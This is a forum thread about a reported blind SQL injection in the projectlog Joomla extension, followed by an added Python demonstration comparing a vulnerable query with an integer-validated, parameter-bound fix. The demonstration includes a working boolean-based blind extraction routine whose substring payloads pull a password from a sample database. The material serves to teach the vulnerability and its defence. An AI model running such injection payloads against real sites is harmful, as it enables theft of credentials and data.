The Thinkery

Blind SQL injection Vulnerability

10 years 10 months ago #13396 by daviestar
daviestar created the topic: Blind SQL injection Vulnerability
Hello Thinkery,

I've been working with projectlog for a while now, and I have to say.. it has been an absolute pleasure to style and customise - if only other extensions were as clean as this one!

After a recent search on google I came across this page: http://www.1337day.com/exploits/13150

Could you please confirm this vulnerability has been locked down? I haven't been able to find any info on your site about it.

Thanks again, I will be crediting you on my site once it's finished.. I'll let you know when I do.

Dave

10 years 10 months ago #13406 by vinny
vinny replied the topic: Re: Blind SQL injection Vulnerability
Hi Dave - we can't confirm that this is a valid exploit (normally we hear about it immediately and release a patch - the link you posted is over a year old and we would have heard about it before now!). We've double-checked the cat model and verified that it will only accept integers to avoid SQL injection; however, we did find a couple of instances where we could be a little more strict - I've attached a patch file.

You can unzip the attached and replace the corresponding files via FTP (for example: site/models/cat.php will replace your front-end com_projectlog/models/cat.php). Please back up the files you replace and let us know if you come across any issues - if all works as expected we'll add these changes to the zip download just in case! Thanks.

Attachment: patch_bsqli_projectlog.zip (not found)


Vinny - The Thinkery
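The reply above rests on one control: the category id is forced to an integer before it reaches the query. The following is an added example, not code from the original thread or from the projectlog component, showing why that matters. It uses an in-memory SQLite database as a stand-in for the component's MySQL tables; the table names, the sample rows (including the fake password), and all function names are constructed for illustration. The vulnerable function splices the request value into the SQL string, the hardened one mirrors casting the parameter to int (the PHP `(int)` cast or an integer request filter) and then binds it, and the blind-extraction routine shows what a boolean-based blind injection actually recovers from the unsafe version and why it gets nothing from the safe one.

```python
import re
import sqlite3

# Constructed sample schema: stands in for the component's category table and
# a sensitive table an attacker would try to read through a blind injection.
SCHEMA = """
CREATE TABLE categories (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO categories VALUES (1, 'Web Design'), (2, 'Logos');
INSERT INTO users VALUES (1, 'admin', 'S3cret!');
"""


def new_db():
    """In-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def get_category_vulnerable(db, catid):
    """Unsafe pattern: the request value is spliced straight into the SQL text,
    so a string like "1 AND (subquery)='x'" changes the query's meaning."""
    sql = "SELECT title FROM categories WHERE id = " + str(catid)
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def to_strict_int(value):
    """Accept only a plain (optionally negative) decimal integer.

    This is the point of the fix described in the reply: the category id is
    forced to an integer before it can reach the query, so SQL fragments
    are refused rather than executed.
    """
    text = str(value).strip()
    if not re.fullmatch(r"-?\d+", text):
        raise ValueError("category id must be an integer")
    return int(text)


def get_category_hardened(db, catid):
    """Safe pattern: validate the type, then bind the value as a parameter."""
    cid = to_strict_int(catid)
    row = db.execute("SELECT title FROM categories WHERE id = ?", (cid,)).fetchone()
    return row[0] if row else None


def handle_request(db, raw_catid):
    """Controller-style wrapper (hypothetical): malformed ids get a 400 and
    never touch the database."""
    try:
        title = get_category_hardened(db, raw_catid)
    except ValueError:
        return {"status": 400, "title": None}
    return {"status": 200 if title else 404, "title": title}


def blind_extract_password(fetch, max_len=32):
    """Boolean-based blind extraction against a fetch(catid_string) oracle.

    Each payload keeps category 1 in the WHERE clause and ANDs it with a guess
    about one character of the stored password. If the page still shows the
    category, the guess was right; otherwise it was wrong. Nothing from the
    users table is ever displayed, which is what makes the injection "blind".
    """
    charset = ("abcdefghijklmnopqrstuvwxyz"
               "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*_-")
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = ("1 AND (SELECT substr(password, %d, 1) FROM users "
                       "WHERE id = 1) = '%s'" % (pos, ch))
            if fetch(payload) is not None:
                recovered += ch
                break
        else:
            # No character matched: either past the end of the value or the
            # endpoint is not injectable (the hardened version refuses the id).
            break
    return recovered


if __name__ == "__main__":
    db = new_db()
    leaked = blind_extract_password(lambda p: get_category_vulnerable(db, p))
    print("vulnerable endpoint leaked:", repr(leaked))
    blocked = blind_extract_password(lambda p: handle_request(db, p)["title"])
    print("hardened endpoint leaked:", repr(blocked))
    print(handle_request(db, "1 AND 1=1"))
```

Two caveats when carrying this over to a real MySQL-backed Joomla site: SQLite compares strings case-sensitively by default, whereas MySQL's usual collations do not, so a real probe would need a BINARY comparison to distinguish `S` from `s`; and the integer cast only covers integer parameters. Any string parameter that reaches a query (search terms, ordering columns, slugs) needs the database layer's quoting or a whitelist, which is the kind of "could be a little more strict" instance a patch like the one attached above would tighten.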